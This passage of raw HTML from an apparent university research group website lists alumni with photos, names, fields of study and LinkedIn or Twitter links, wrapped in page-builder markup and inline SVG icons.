gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 